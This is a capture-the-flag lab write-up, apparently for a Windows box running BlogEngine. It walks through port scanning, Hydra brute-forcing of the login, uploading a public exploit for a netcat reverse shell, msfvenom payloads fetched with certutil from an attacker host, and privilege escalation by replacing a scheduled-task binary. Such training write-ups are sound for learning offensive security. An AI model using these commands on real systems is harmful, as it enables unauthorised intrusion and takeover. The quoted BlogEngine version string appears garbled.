[Task 1] Deploy the vulnerable Windows machine
- Deploy the machine and access its web server.
nmap -Pn <ip>
High port scan
nmap -p1000- -Pn <ip>
Service and OS scan
nmap -A -p 80,3389 <ip>
nmap -p 80,3389 --script vuln <ip>
This machine may have some filter or firewall, because I can do only port scanning.
There’re 2 services
Port no. 80 Microsoft-ISS?
Port no.3389 Microsoft remote desktop?
I guess it’s windows machine, because there’s port no.3389 is probably Remote Desktop Service.
2. Whats the name of the clown displayed on the homepage?
Access HTTP site
[Task 2] Using Hydra to brute-force a login
- What request type is the Windows website login form using?
Let’s explore the site
Try SQL Injection
1' or 1=1--+
SQL injection doesn’t work.
XSS doesn’t work neither.
Archive section, not useful
Try SQL injection
Seems like the form is not properly implemented.
Login section, this site use “blogengine.net”
Default credentail is admin:admin
Let’s try it. Failed!!!
Let’s find other directory with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
I access many links, but it’s as same as other sections
Let’s access robots.txt, not much useful.
Since there’s no other ways left. I’ll have to do brute-forcing with hydra.
Create user list first
echo admin > users.txtecho pennywise >> users.txtcat users.txt
Intercept login request w/ Burp Suite
It’s a POST request
2. Guess a username, choose a password wordlist and gain credentials to a user account!
Craft hydra command, copy the request and edit username value as “^USER^” and password value as “^PASS^”
Prepare hydra command
hydra -L <username list> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
Credential is admin:1qaz2wsx .
[Task 3] Compromise the machine
- Now you have logged into the website, are you able to identify the version of the BlogEngine?
At about section, BlogEngine is version 126.96.36.199.
2. Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
I can use seachsploit instead of finding in the site.
searchsploit -m 46353
Review the script
3. Using the public exploit, gain initial access to the server.
Who is the webserver running as?
Edit IP address and port no.
Save as PostView.ascx
Back to dashboard, click at Content -> Posts -> New
Click directory icon
Upload the script
nc -lvp 1234
Access the uploaded script
Now I have a shell.
[Task 4] Windows Privilege Escalation
- Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Create HTTP Server
python -m SimpleHTTPServer 80
Back to victim’s machine, download file
cd \Windows\Tempcertutil -urlcache -f http://<ip>/shell.exe shell.exedir
Also, I download winPEAS.exe in case I need it later.
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
Back to attacker’s machine, set up metasploit handler
set PAYLOAD windows/meterpreter/reverse_tcp
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Back to victim’s machine, run shell.exe
Back to attacker’s machine, now I have a shell.
2. What is the OS version of this windows machine?
2. What is the name of the abnormal service running?
Try to escalate privilege
Seems like I can’t do by this method.
I’ll try to run these exploits.
use exploit/windows/local/bypassuac_eventvwrset SESSION 1run
I tried to run other exploits, but I failed with every exploits. I have to find another way.
2. What is the name of the binary you’re supposed to exploit?
I need to run WinPEAS.
Seems like there’re errors. I need to run simpler script, winPEAS.bat .
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat
3. Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?
cd Program Files (x86)cd SystemSchedulerdir
Read the log file
There’s Message.exe with Administrator type.
Copy Message.exe as a backup in case I screw up.
cd ..copy Message.exe Message_bak.exe
I need to replace Message.exe with malicious file.
Back to attacker’s machine, create another shell file.
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
nc -lvp 1236
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe
Back to attacker’s machine at port no.1236 listener, wait for a moment
Seems like I can’t run this command.
Run whoami alternative
cd \Users\jeff\Desktopdirtype user.txt
4. What is the root flag?
cd \Users\Administrator\Desktoptype root.txt